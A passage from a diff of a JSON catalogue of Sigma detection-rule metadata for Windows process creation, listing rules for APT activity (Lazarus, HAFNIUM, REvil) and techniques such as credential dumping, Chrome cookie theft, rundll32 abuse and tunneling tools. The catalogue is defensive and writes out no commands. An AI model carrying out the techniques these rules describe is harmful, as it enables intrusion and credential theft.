"Florian Roth", - "creation_date": "2020/05/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_greenbug_may20.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml" - ], - "tags": [ - "attack.g0049", - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1036.005" - ] - }, - "uuid": "3711eee4-a808-4849-8a14-faf733da3612", - "value": "Greenbug Campaign Indicators" - }, - { - "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/03/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_hafnium.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", - "https://twitter.com/GadixCRK/status/1369313704869834753?s=20", - "https://twitter.com/BleepinComputer/status/1372218235949617161", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546", - "attack.t1053" - ] - }, - "uuid": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", - "value": "Exchange Exploitation Activity" - }, - { - "description": "Detects Hurricane Panda Activity", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/03/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_hurricane_panda.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.g0009", - "attack.t1068" - ] - }, - "uuid": "0eb2107b-a596-422e-b123-b389d5594ed7", - "value": "Hurricane Panda Activity" - }, - { - "description": "Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/02/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_judgement_panda_gtr19.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.g0010", - "attack.credential_access", - "attack.t1003.001", - "attack.exfiltration", - "attack.t1560.001" - ] - }, - "uuid": "03e2746e-2b31-42f1-ab7a-eb39365b2422", - "value": "Judgement Panda Exfil Activity" - }, - { - "description": "Detects Registry modifications performed by Ke3chang malware in campaigns running in 2019 and 2020", - "meta": { - "author": "Markus Neis, Swisscom", - "creation_date": "2020/06/18", - "falsepositive": [ - "Will need to be looked for combinations of those processes" - ], - "filename": "proc_creation_win_apt_ke3chang_regadd.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", - "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ke3chang_regadd.yml" - ], - "tags": [ - "attack.g0004", - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "7b544661-69fc-419f-9a59-82ccc328f205", - "value": "Ke3chang Registry Key Modifications" - }, - { - "description": "Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/04/20", - "falsepositive": [ - "Should not be any false positives" - ], - "filename": "proc_creation_win_apt_lazarus_activity_apr21.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_apr21.yml" - ], - "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1106" - ] - }, - "uuid": "4a12fa47-c735-4032-a214-6fab5b120670", - "value": "Lazarus Activity Apr21" - }, - { - "description": "Detects different process creation events as described in various threat reports on Lazarus group activity", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/12/23", - "falsepositive": [ - "Overlap with legitimate process activity in some cases (especially selection 3 and 4)" - ], - "filename": "proc_creation_win_apt_lazarus_activity_dec20.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", - "https://www.hvs-consulting.de/lazarus-report/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml" - ], - "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "24c4d154-05a4-4b99-b57d-9b977472443a", - "value": "Lazarus Activity Dec20" - }, - { - "description": "Detects different loaders as described in various threat reports on Lazarus group activity", - "meta": { - "author": "Florian Roth, wagga", - "creation_date": "2020/12/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_lazarus_loader.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.hvs-consulting.de/lazarus-report/", - "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml" - ], - "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "7b49c990-4a9a-4e65-ba95-47c9cc448f6e", - "value": "Lazarus Loaders" - }, - { - "description": "Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff)", - "meta": { - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", - "creation_date": "2020/06/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_lazarus_session_highjack.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_session_highjack.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ] - }, - "uuid": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", - "value": "Lazarus Session Highjacker" - }, - { - "description": "Detects suspicious command line patterns as seen being used by MERCURY threat actor", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_mercury.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mercury.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.g0069" - ] - }, - "uuid": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", - "value": "MERCURY Command Line Patterns" - }, - { - "description": "Detecting DNS tunnel activity for Muddywater actor", - "meta": { - "author": "@caliskanfurkan_", - "creation_date": "2020/06/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_muddywater_dnstunnel.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/", - "https://www.vmray.com/analyses/5ad401c3a568/report/overview.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_muddywater_dnstunnel.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "36222790-0d43-4fe8-86e4-674b27809543", - "value": "DNS Tunnel Technique from MuddyWater" - }, - { - "description": "Detects specific process parameters as used by Mustang Panda droppers", - "meta": { - "author": "Florian Roth, oscd.community", - "creation_date": "2019/10/30", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_apt_mustangpanda.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/", - "https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/", - "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml" - ], - "tags": [ - "attack.t1587.001", - "attack.resource_development" - ] - }, - "uuid": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", - "value": "Mustang Panda Dropper" - }, - { - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_revil_kaseya.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers", - "https://www.joesandbox.com/analysis/443736/0/html", - "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", - "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", - "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059", - "attack.g0115" - ] - }, - "uuid": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", - "value": "REvil Kaseya Incident Malware Patterns" + "uuid": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", + "value": "Suspicious Control Panel DLL Load" }, { "description": "Detects Silence downloader. These commands are hardcoded into the binary.", @@ -34435,29 +28307,2658 @@ "value": "Silence.Downloader V3" }, { - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "description": "Detects suspicious process related to rundll32 based on arguments", "meta": { - "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", - "creation_date": "2019/03/04", + "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", + "creation_date": "2019/01/16", "falsepositive": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "filename": "proc_creation_win_apt_slingshot.yml", + "filename": "proc_creation_win_susp_rundll32_activity.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securelist.com/apt-slingshot/84312/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml" + "https://twitter.com/nas_bench/status/1433344116071583746", + "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", + "https://twitter.com/eral4m/status/1479106975967240209", + "https://twitter.com/eral4m/status/1479080793003671557", + "https://twitter.com/Hexacorn/status/885258886428725250", + "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "e593cf51-88db-4ee1-b920-37e89012a3c9", + "value": "Suspicious Rundll32 Activity" + }, + { + "description": "Detects a PsExec service start", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/13", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_psexesvc_start.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml" + ], + "tags": [ + "attack.execution", + "attack.s0029", + "attack.t1569.002" + ] + }, + "uuid": "3ede524d-21cc-472d-a3ce-d21b568d8db7", + "value": "PsExec Service Start" + }, + { + "description": "Detects usage of the \"dir\" command that's part of windows batch/cmd to collect information about directories", + "meta": { + "author": "frack113", + "creation_date": "2021/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_dir.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dir.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1217" + ] + }, + "uuid": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", + "value": "Suspicious DIR Execution" + }, + { + "description": "Detects user accept agreement execution in psexec commandline", + "meta": { + "author": "omkar72", + "creation_date": "2020/10/30", + "falsepositive": [ + "Administrative scripts." + ], + "filename": "proc_creation_win_susp_psexec_eula.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexec_eula.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "attack.t1021" + ] + }, + "uuid": "730fc21b-eaff-474b-ad23-90fd265d4988", + "value": "Psexec Accepteula Condition" + }, + { + "description": "Detects specific process parameters as seen in DTRACK infections", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/30", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_malware_dtrack.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/", + "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/", + "https://securelist.com/my-name-is-dtrack/93338/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "value": "DTRACK Process Creation" + }, + { + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_whoami_as_param.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/blackarrowsec/status/1463805700602224645?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ] + }, + "uuid": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "value": "WhoAmI as Parameter" + }, + { + "description": "Detect use of sqlite binary to query the Chrome Cookies database and steal the cookie data contained within it", + "meta": { + "author": "TropChaud", + "creation_date": "2022/12/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sqlite_chrome_cookies.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/84d9edaaaa2c5511144521b0e4af726d1c7276ce/atomics/T1539/T1539.md#atomic-test-2---steal-chrome-cookies-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_chrome_cookies.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1539" + ] + }, + "uuid": "24c77512-782b-448a-8950-eddb0785fc71", + "value": "SQLite Chrome Cookie DB Access" + }, + { + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/25", + "falsepositive": [ + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + ], + "filename": "proc_creation_win_screenconnect_anomaly.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "value": "ScreenConnect Backstage Mode Anomaly" + }, + { + "description": "Execution of well known tools for data exfiltration and tunneling", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate Administrator using tools" + ], + "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.command_and_control", + "attack.t1041", + "attack.t1572", + "attack.t1071.001" + ] + }, + "uuid": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", + "value": "Exfiltration and Tunneling Tools Execution" + }, + { + "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", + "meta": { + "author": "frack113", + "creation_date": "2022/05/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_cl_loadassembly.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", + "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_loadassembly.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", + "value": "CL_LoadAssembly.ps1 Proxy Execution" + }, + { + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/15", + "falsepositive": [ + "Unknown but benign sub processes of the Windows DNS service dns.exe" + ], + "filename": "proc_creation_win_exploit_cve_2020_1350.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", + "https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "value": "DNS RCE CVE-2020-1350" + }, + { + "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/14", + "falsepositive": [ + "Legitimate usage to restore snapshots", + "Legitimate admin activity" + ], + "filename": "proc_creation_win_susp_ntdsutil_usage.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "a58353df-af43-4753-bad0-cd83ef35eef5", + "value": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)" + }, + { + "description": "Detects suspicious use of XORDump process memory dumping utility", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/28", + "falsepositive": [ + "Another tool that uses the command line switches of XORdump" + ], + "filename": "proc_creation_win_xordump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/audibleblink/xordump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xordump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "value": "XORDump Use" + }, + { + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/07", + "falsepositive": [ + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + ], + "filename": "proc_creation_win_ntfs_short_name_path_use_image.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://twitter.com/frack113/status/1555830623633375232", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "a96970af-f126-420d-90e1-d37bf25e50e1", + "value": "Use Short Name Path in Image" + }, + { + "description": "Detects a Windows command line executable started from MMC", + "meta": { + "author": "Karneades, Swisscom CSIRT", + "creation_date": "2019/08/05", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_mmc_spawn_shell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_spawn_shell.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.003" + ] + }, + "uuid": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "value": "MMC Spawning Windows Shell" + }, + { + "description": "Detects the creation of a process from Windows task manager", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/13", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_taskmgr_parent.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "3d7679bd-0c00-440c-97b0-3f204273e6c7", + "value": "Taskmgr as Parent" + }, + { + "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network", + "meta": { + "author": "frack113", + "creation_date": "2021/12/11", + "falsepositive": [ + "Administrator, hotline ask to user" + ], + "filename": "proc_creation_win_susp_tasklist_command.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tasklist_command.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1057" + ] + }, + "uuid": "63332011-f057-496c-ad8d-d2b6afb27f96", + "value": "Suspicious Tasklist Discovery Command" + }, + { + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_iis_connection_strings_decryption.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_connection_strings_decryption.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "97dbf6e2-e436-44d8-abee-4261b24d3e41", + "value": "Microsoft IIS Connection Strings Decryption" + }, + { + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/08", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_iox.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/EddieIvan01/iox", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iox.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "d7654f02-e04b-4934-9838-65c46f187ebc", + "value": "IOX Tunneling Tool" + }, + { + "description": "Detects process dump via legitimate sqldumper.exe binary", + "meta": { + "author": "Kirill Kiryanov, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate MSSQL Server actions" + ], + "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", + "https://twitter.com/countuponsec/status/910977826853068800", + "https://twitter.com/countuponsec/status/910969424215232518", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", + "value": "Dumping Process via Sqldumper.exe" + }, + { + "description": "Use of reg to get MachineGuid information", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_machineguid.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_machineguid.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "f5240972-3938-4e56-8e4b-e33893176c1f", + "value": "Suspicious Query of MachineGUID" + }, + { + "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", + "meta": { + "author": "frack113", + "creation_date": "2022/07/18", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_icacls_deny.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_icacls_deny.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "4ae81040-fc1c-4249-bfa3-938d260214d9", + "value": "Use Icacls to Hide File to Everyone" + }, + { + "description": "Detect suspicious parent processes of well-known Windows processes", + "meta": { + "author": "vburov", + "creation_date": "2019/02/23", + "falsepositive": [ + "Some security products seem to spawn these" + ], + "filename": "proc_creation_win_proc_wrong_parent.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1036/", + "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", + "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", + "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_wrong_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003", + "attack.t1036.005" + ] + }, + "uuid": "96036718-71cc-4027-a538-d1587e0006a7", + "value": "Windows Processes Suspicious Parent Directory" + }, + { + "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unknown" + ], + "filename": 